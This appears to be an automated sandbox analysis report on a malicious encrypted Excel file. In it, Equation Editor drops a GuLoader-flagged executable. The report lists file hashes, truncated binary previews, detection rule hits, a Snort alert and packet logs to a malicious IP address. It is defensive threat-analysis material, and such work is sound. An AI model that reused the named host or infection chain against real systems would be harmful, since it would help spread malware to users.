                    Preview: .PNG........IHDR..............I.M....IDATx....T.]...G.;..nuww7.s...U..K......Ih....q!i...K....t.'k.W..i..>.......B.....E.0....f.a.....e....++...P..|..^...L.S}r:..............sM....p..p-..y]...t7'.D)....../...k....pzos.......6;,..H.....U..a..9..1...$......*.kI<..\F...$.E....?[B(.9.....H..!.....0AV..g.m...23..C..g(.%...6..>.O.r...L..t1.Q-.bE......)........|i ..."....V.g.\.G..p..p.X[.....*%hyt...@..J...~.p.....|..>...~.`..E_...*.iU.G...i.O..r6...iV.....@..........Jte...5Q.P.v;..B.C...m......0.N......q...b.....Q...c.moT.e6OB...p.v"...."........9..G....B}...../m...0g...8......6.$.$]p...9.....Z.a.sr.;B.a....m...>...b..B..K...{...+w?....B3...2...>.......1..-.'.l.p........L....\.K..P.q......?>..fd.`w*..y..|y..,.....i..'&.?.....).e.D ?.06......U.%.2t........6.:..D.B....+~.....M%".fG]b\.[........1....".......GC6.....J.+......r.a...ieZ..j.Y...3..Q*m.r.urb.5@.e.v@@....gsb.{q-..3j........s.f.|8s$p.?3H......0`..6)...bD....^..+....9..;$...W::.jBH..!tK
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B8598AE.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):79394
                    Entropy (8bit):7.864111100215953
                    Encrypted:false
                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                    MD5:16925690E9B366EA60B610F517789AF1
                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                    Malicious:false
                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B99C14D7.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):51166
                    Entropy (8bit):7.767050944061069
                    Encrypted:false
                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                    Malicious:false
                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D467075B.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):84203
                    Entropy (8bit):7.979766688932294
                    Encrypted:false
                    SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
                    MD5:208FD40D2F72D9AED77A86A44782E9E2
                    SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
                    SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
                    SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
                    Malicious:false
                    Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DEDF5C96.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 399 x 605, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):50311
                    Entropy (8bit):7.960958863022709
                    Encrypted:false
                    SSDEEP:768:hfo72tRlBZeeRugjj8yooVAK92SYAD0PSsX35SVFN0t3HcoNz8WEK6Hm8bbxXVGx:hf0WBueSoVAKxLD06w35SEVNz8im0AEH
                    MD5:4141C7515CE64FED13BE6D2BA33299AA
                    SHA1:B290F533537A734B7030CE1269AC8C5398754194
                    SHA-256:F6B0FE628E1469769E6BD3660611B078CEF6EE396F693361B1B42A9100973B75
                    SHA-512:74E9927BF0C6F8CB9C3973FD68DAD12B422DC4358D5CCED956BC6A20139B21D929E47165F77D208698924CB7950A7D5132953C75770E4A357580BF271BD9BD88
                    Malicious:false
                    Preview: .PNG........IHDR.......].......^....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD..............oFFs.......F.#-nT....pHYs...%...%.IR$.....vpAg.......0...O.....IDATx...h.w....V!...D.........4.p .X(r..x.&..K.(.L...P..d5.R......b.......C...BP...,% ....qL.,.!E.ni..t......H._......G..|~=.....<..#.J!.N.a..a.Q.V...t:.M.v;=..0.s..ixa...0..<...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..q.+..a..5.<..a...`..a\..a..qM../.u....h6..|.22..g4M.........C.u..y,--..'....a.?~.W.\i.>7q.j..y....iLNN.....5\..w"..b~~...J.sssm.d.Y.u.G....s.\..R.`qq.....C;..$..&..2..x..J..fgg...]=g.Y.y..N..(SN.S8.eZ.T...=....4.?~..uK.;....SSS...iY.Q.n.I.u\.x..o.,.av.N.(..H..B..X......... ..amm...h4.t:..].j..tz[.(..#..}yy./..".z.-[!4....a...jj......,dY.7.|.F.....\.~.g.....x..Y...R..\.....w.\.h..K....h..nM
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F77229A3.emf
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                    Category:dropped
                    Size (bytes):648132
                    Entropy (8bit):2.8124530118203914
                    Encrypted:false
                    SSDEEP:3072:134UL0tS6WB0JOqFB5AEA7rgXuzqr8nG/qc+L+:l4UcLe0JOcXuurhqcJ
                    MD5:955A9E08DFD3A0E31C7BCF66F9519FFC
                    SHA1:F677467423105ACF39B76CB366F08152527052B3
                    SHA-256:08A70584E1492DA4EC8557567B12F3EA3C375DAD72EC15226CAFB857527E86A5
                    SHA-512:39A2A0C062DEB58768083A946B8BCE0E46FDB2F9DDFB487FE9C544792E50FEBB45CEEE37627AA0B6FEC1053AB48841219E12B7E4B97C51F6A4FD308B52555688
                    Malicious:false
                    Preview: ....l...........................Q>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................V$.....o..f.V.@o.%.....o...o.....L.o...o.RQAXL.o.D.o.......o.0.o.$QAXL.o.D.o. ...Id.VD.o.L.o. ............d.V........................................%...X...%...7...................{$..................C.a.l.i.b.r.i.............o.X...D.o.x.o..8.V........dv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                    C:\Users\user\Desktop\~$BL_SGN11203184.xlsx
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):330
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                    MD5:96114D75E30EBD26B572C1FC83D1D02E
                    SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                    SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                    SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                    Malicious:true
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    C:\Users\Public\vbc.exe
                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):147456
                    Entropy (8bit):5.607689655560483
                    Encrypted:false
                    SSDEEP:1536:Fttu3FssKUmvr9DJ1FJS1bQNZ6bp/+Dtr5m3XSt4lYS0eXJWUTFboob:ztu3alxx3fSQmbs55r4l6eXJWUB0ob
                    MD5:99BBF83ABE9D6E4ECC91493E32230833
                    SHA1:B0BD6BA2DC10EB5552EDC7A3460C80EE0EB1B11E
                    SHA-256:2B2A00650DC91D1A7CCFA4A62E3462762C62D8A092BDDB75943F87074F1D56A5
                    SHA-512:0F6B9F9A843F491B925AAB0AF5D4F08024A2D430C41022C23AFB46CE3ABDF7881E8D87AC6D93F5ADFC2F11AEE0F0BB0AC28FA2500EC118BC1ED496281D3AFEC6
                    Malicious:true
                    Yara Hits:
                    • Rule: JoeSecurity_GuLoader_1, Description: Yara detected GuLoader, Source: C:\Users\Public\vbc.exe, Author: Joe Security
                    Antivirus:
                    • Antivirus: Metadefender, Detection: 31%, Browse
                    • Antivirus: ReversingLabs, Detection: 59%
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......G.....................0............... ....@..........................P......0.......................................$...(....@..P...................................................................(... ....................................text............................... ..`.data...P.... ....... ..............@....rsrc...P....@.......0..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

                    Static File Info

                    General

                    File type:CDFV2 Encrypted
                    Entropy (8bit):7.995550090763264
                    TrID:
                    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                    File name:BL_SGN11203184.xlsx
                    File size:1317888
                    MD5:06eb9a2b3d7113604968b87722ed242a
                    SHA1:2a6929b76b8b69a4e3a3766881280c63af765cb1
                    SHA256:1554d0f1b36381c9a323749cd62b7870c8273d8020fc81df09cb159a3bb84acc
                    SHA512:1f0f84d1c7bb6da1a66bbe25bd29336e4b1e84af67125ee7da47caf0ef523c9a5bb1df023d9d91c83c03e29b5a5c38784780756368e7f4ee35cd39afbc9b3bf6
                    SSDEEP:24576:BL0fDpdsXTvaIhcjRG0WZQK2Txwjki59qAusGovj/MWNFhb/W+:Bgne7aptGxbIqspsG0rMWNFZO+
                    File Content Preview:........................>.......................................................................................................|.......~...............z......................................................................................................

                    File Icon

                    Icon Hash:e4e2aa8aa4b4bcb4

                    Static OLE Info

                    General

                    Document Type:OLE
                    Number of OLE Files:1

                    OLE File "BL_SGN11203184.xlsx"

                    Indicators

                    Has Summary Info:False
                    Application Name:unknown
                    Encrypted Document:True
                    Contains Word Document Stream:False
                    Contains Workbook/Book Stream:False
                    Contains PowerPoint Document Stream:False
                    Contains Visio Document Stream:False
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:False

                    Streams

                    Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                    General
                    Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                    File Type:data
                    Stream Size:64
                    Entropy:2.73637206947
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                    Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                    Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                    General
                    Stream Path:\x6DataSpaces/DataSpaceMap
                    File Type:data
                    Stream Size:112
                    Entropy:2.7597816111
                    Base64 Encoded:False
                    Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                    Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                    Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                    General
                    Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                    File Type:data
                    Stream Size:200
                    Entropy:3.13335930328
                    Base64 Encoded:False
                    Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                    Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                    Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                    General
                    Stream Path:\x6DataSpaces/Version
                    File Type:data
                    Stream Size:76
                    Entropy:2.79079600998
                    Base64 Encoded:False
                    Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                    Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                    Stream Path: EncryptedPackage, File Type: data, Stream Size: 1303128
                    General
                    Stream Path:EncryptedPackage
                    File Type:data
                    Stream Size:1303128
                    Entropy:7.99983573817
                    Base64 Encoded:True
                    Data ASCII:E . . . . . . . . . 2 . . . . . . J a . . . . . . . . . . . f . o . M [ . g . M a . . . . . b j l . L . . f . . . . . . . . E . . . . . A . . f . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | . . ~ 9 . { . . . . . . . . . | .
                    Data Raw:45 e2 13 00 00 00 00 00 91 2e 32 d5 91 ed a7 b7 a9 4a 61 a2 c6 0d 8b b9 d4 eb 2e d9 a5 88 66 e7 6f 15 4d 5b f6 67 94 4d 61 d6 0c 2e f4 83 62 6a 6c 0e 4c 11 08 66 a8 b4 05 cf 1e a7 03 b3 45 1b c2 bd cc e2 41 da a4 66 c5 98 92 ec bf 0e 7c b8 87 7e 39 a1 7b 1d 01 cb c5 98 92 ec bf 0e 7c b8 87 7e 39 a1 7b 1d 01 cb c5 98 92 ec bf 0e 7c b8 87 7e 39 a1 7b 1d 01 cb c5 98 92 ec bf 0e 7c b8
                    Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                    General
                    Stream Path:EncryptionInfo
                    File Type:data
                    Stream Size:224
                    Entropy:4.49728945514
                    Base64 Encoded:False
                    Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . o L . . . k + . . 1 . . . A . . . . . K o N . z ? . . . . . . . . . . . . e r . . S . . K . . . . . . . Q . . * . X 0 E . . e D G z "
                    Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                    Network Behavior

                    Snort IDS Alerts

                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                    06/10/21-15:17:32.895609TCP2022550ET TROJAN Possible Malicious Macro DL EXE Feb 20164916780192.168.2.22103.155.82.236

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jun 10, 2021 15:17:32.645184040 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:32.894922018 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:32.895140886 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:32.895608902 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.146260023 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.146306038 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.146328926 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.146351099 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.146495104 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.395716906 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395765066 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395785093 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395802975 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395828962 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395852089 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395875931 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395900011 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.395981073 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.397898912 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.645212889 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645260096 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645279884 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645298958 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645324945 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645348072 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645370960 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645394087 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645417929 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.645420074 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.645469904 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.645476103 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.645478964 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.646986961 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647037983 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647062063 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647088051 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647102118 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.647128105 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647134066 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.647139072 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.647156000 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.647170067 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.647186995 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.648278952 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894490957 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894521952 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894537926 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894556999 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894566059 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894573927 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894601107 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894602060 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894606113 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894608974 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894620895 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894637108 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894646883 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894658089 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894659042 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894675970 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894676924 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894692898 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894692898 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894710064 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894712925 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894725084 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894731045 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894748926 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894748926 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894764900 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894764900 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894782066 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894783020 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894799948 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894804001 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894814014 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894821882 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.894829988 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.894856930 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896171093 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896209002 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896231890 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896239996 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896256924 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896256924 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896262884 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896284103 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896294117 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896306992 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896317959 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896332979 CEST8049167103.155.82.236192.168.2.22
                    Jun 10, 2021 15:17:33.896334887 CEST4916780192.168.2.22103.155.82.236
                    Jun 10, 2021 15:17:33.896358013 CEST8049167103.155.82.236192.168.2.22
